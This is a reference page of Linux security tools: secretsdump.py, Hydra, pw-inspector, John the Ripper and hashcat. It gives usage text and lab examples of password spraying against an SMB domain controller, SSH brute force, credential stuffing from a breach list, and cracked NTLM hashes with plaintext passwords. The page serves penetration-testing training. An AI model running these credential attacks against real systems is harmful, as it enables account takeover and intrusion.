Security Slice

Tag: linux tools

Security tools that can run on Linux

secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and read the rest of the data from there.

PlatformPython
AuthorAlberto Solino
LicenseModified Apache License 1.1
URLsecretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

THC-Hydra

Description

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

Usage

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
 
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
 
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smb2 smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
 
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp mongodb ncp oracle sapr3.
 
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
 
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Examples

 hydra -L /opt/passwords/facebook-f.last-100.txt -p Winter2022 -m workgroup:\{hiboxy\} x.x.x.x smb2

This will use the usernames in the specified file and spray the specified password against all of them using the hiboxy domain, the specified domain controller, and the smb2 protocol.

sec@slingshot:~$ hydra -L /opt/passwords/facebook-f.last-100.txt -p Winter2022 -m workgroup:{hiboxy} 10.130.10.4 smb2
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 20:00:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:100/p:1), ~7 tries per task
[DATA] attacking smb2://10.130.10.4:445/workgroup:{hiboxy}
[445][smb2] host: 10.130.10.4   login: janderson   password: Winter2022
[445][smb2] host: 10.130.10.4   login: alee   password: Winter2022
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 20:00:24
hydra -l bgreen -P /opt/passwords/simple.txt x.x.x.x ssh

This will attempt to brute force the bgreen account using the passwords in the provided file over the ssh protocol.

sec@slingshot:~$ hydra -l bgreen -P /opt/passwords/simple.txt 10.130.10.10 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 23:27:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries (l:1/p:34), ~3 tries per task
[DATA] attacking ssh://10.130.10.10:22/
[22][ssh] host: 10.130.10.10   login: bgreen   password: Password1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 23:27:18
hydra -C /opt/passwords/hiboxy-breach.txt x.x.x.x -m workgroup:\{hiboxy\} smb2

This command will use the user:password pairs in the provided file against the domain controller for the hiboxy domain using the smb2 protocol.

sec@slingshot:~$ hydra -C /opt/passwords/hiboxy-breach.txt 10.130.10.4 -m workgroup:{hiboxy} smb2
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 23:33:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 22 login tries, ~2 tries per task
[DATA] attacking smb2://10.130.10.4:445/workgroup:{hiboxy}
[445][smb2] host: 10.130.10.4   login: bking   password: ThaBoss1
[445][smb2] host: 10.130.10.4   login: jmartin   password: Quincy626
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 23:33:53

Blog Posts

pw-inspector

Description

A THC Hydra tool to reduce the password list (based on known password policies, etc.).

Usage

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [https://github.com/vanhauser-thc/thc-hydra]
 
Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s
 
Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not within the sets above
 
PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.

Examples

Blog Posts

John the Ripper

Description

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

PlatformAll
AuthorOpenwall
LicenseGPLv3
URLhttps://www.openwall.com/john/

Usage

John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX2 AC]
Copyright (c) 1996-2019 by Solar Designer and others
Homepage: http://www.openwall.com/john/
 
Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION[,..]]    "single crack" mode, using default or named rules
--single=:rule[,..]        same, using "immediate" rule(s)
--wordlist[=FILE] --stdin  wordlist mode, read words from FILE or stdin
                  --pipe   like --stdin, but bulk reads, and allows rules
--loopback[=FILE]          like --wordlist, but extract words from a .pot file
--dupe-suppression         suppress all dupes in wordlist (and force preload)
--prince[=FILE]            PRINCE mode, read words from FILE
--encoding=NAME            input encoding (eg. UTF-8, ISO-8859-1). See also
                           doc/ENCODINGS and --list=hidden-options.
--rules[=SECTION[,..]]     enable word mangling rules (for wordlist or PRINCE
                           modes), using default or named rules
--rules=:rule[;..]]        same, using "immediate" rule(s)
--rules-stack=SECTION[,..] stacked rules, applied after regular rules or to
                           modes that otherwise don't support rules
--rules-stack=:rule[;..]   same, using "immediate" rule(s)
--incremental[=MODE]       "incremental" mode [using section MODE]
--mask[=MASK]              mask mode using MASK (or default from john.conf)
--markov[=OPTIONS]         "Markov" mode (see doc/MARKOV)
--external=MODE            external mode or word filter
--subsets[=CHARSET]        "subsets" mode (see doc/SUBSETS)
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset file. It will be overwritten
--show[=left]              show cracked passwords [if =left, then uncracked]
--test[=TIME]              run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]     load salts with[out] COUNT [to MAX] hashes
--costs=[-]C[:M][,...]     load salts with[out] cost value Cn [to Mn]. For
                           tunable cost parameters, see doc/OPTIONS
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL     this node's number range out of TOTAL count
--fork=N                   fork N processes
--pot=NAME                 pot file to use
--list=WHAT                list capabilities, see --list=help or doc/OPTIONS
--devices=N[,..]           set OpenCL device(s) (see --list=opencl-devices)
--format=NAME              force hash of type NAME. The supported formats can
                           be seen with --list=formats and --list=subformats

Examples

john ~/labs/web01.hashes

This will run john in default mode and try to crack the hashes in the provided file.

msf6 exploit(windows/smb/psexec) > john labs/web01.hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "LM-opencl"
Use the "--format=LM-opencl" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-opencl"
Use the "--format=NT-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 38 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 78 candidates buffered for the current salt, minimum 512 needed for performance.
Proceeding with wordlist:/usr/local/share/john/password.lst, rules:Wordlist
                 (dmckenzie)
                 (ckhan)
                 (phorne)
                 (egeorge)
                 (pmartin)
                 (scook)
                 (kkennedy)
                 (srichardson)
                 (dbryant)
                 (sbates)
                 (cgentry)
                 (khansen)
                 (abates)
                 (nramos)
                 (dwilliams)
                 (rduarte)
                 (ksutton)
                 (kcooper)
                 (hhopkins)
                 (jrivera)
                 (vcollins)
                 (mmiller)
                 (awalker)
                 (tandersen)
                 (lstout)
                 (mlara)
                 (wrobinson)
                 (rgray)
                 (aparker)
                 (slopez)
                 (antivirus)
                 (SROCAdmin)
                 (WDAGUtilityAccount)
                 (DefaultAccount)
                 (Guest)
                 (Administrator)
Proceeding with incremental:LM_ASCII
MIMIGOT          (vberry:1)
KNENZ2G          (vberry:2)
38g 0:00:00:02 DONE 3/3 (2022-03-17 01:29) 15.01g/s 40495Kp/s 40495Kc/s 48036KC/s KNEIRS8..KNENZ2G
Warning: passwords printed above might be partial
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed
 john ~/labs/web01.hashes –show

This command will show which passwords have already been cracked in the given file.

sec560@slingshot:~$ sudo john labs/web01.hashes --show
Administrator::500:aad3b435b51404eeaad3b435b51404ee:1ef98de8555541f1579f98084f32875b:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount::504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin::1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus::1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez::1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker::1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray::1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson::1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara::1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout::1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen::1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker::1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller::1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins::1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera::1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins::1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper::1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton::1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte::1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams::1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos::1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates::1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen::1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:MIMIGOTKNENZ2G:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry::1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates::1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant::1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson::1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy::1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook::1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin::1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge::1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne::1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan::1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie::1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::
 
38 password hashes cracked, 0 left
john –format=nt –wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes

The following is the output when you run john with a wordlist.

sec560@slingshot:~$ sudo john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes
Using default input encoding: UTF-8
Loaded 36 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Remaining 35 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Warrior07        (vcollins)
Tibbetts3        (slopez)
Patrique2238     (wrobinson)
Packardbell350   (mlara)
Oozle11          (aparker)
KAMTPS20!!tim    (rgray)
Chirmol01        (awalker)
BHLMSTz2         (mmiller)
Angels100%       (tandersen)
2soWht!a         (lstout)
10g 0:00:00:00 DONE (2022-03-17 01:46) 10.30g/s 14787Kp/s 14787Kc/s 475458KC/s  Ttwwl789..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
 zip2john file.zip

This will produce a crackable hash from an encrypted zip file and store it in a file named backup.hashes.

└─$ zip2john ./backup.zip > ./backup.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
john –format=Raw-MD5 –wordlist=./wordlist8.txt ./passhash.txt

This command will attempt to crack a raw MD5 password hash using the wordlist.

└─$ john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)    
1g 0:00:00:00 DONE (2022-03-27 14:12) 50.00g/s 1891Kp/s 1891Kc/s 1891KC/s snapdragon..play2win
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Blog Posts

hashcat

Description

World’s fastest password cracker

PlatformAll
AuthorJens Steube
LicenseMIT
URLhttps://hashcat.net/hashcat/

Usage

hashcat (v6.2.4) starting in help mode
 
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
 
- [ Options ] -
 
 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
